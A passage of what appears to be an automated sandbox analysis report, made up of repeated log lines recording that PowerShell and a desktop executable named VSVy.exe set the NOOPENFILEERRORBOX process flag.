Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
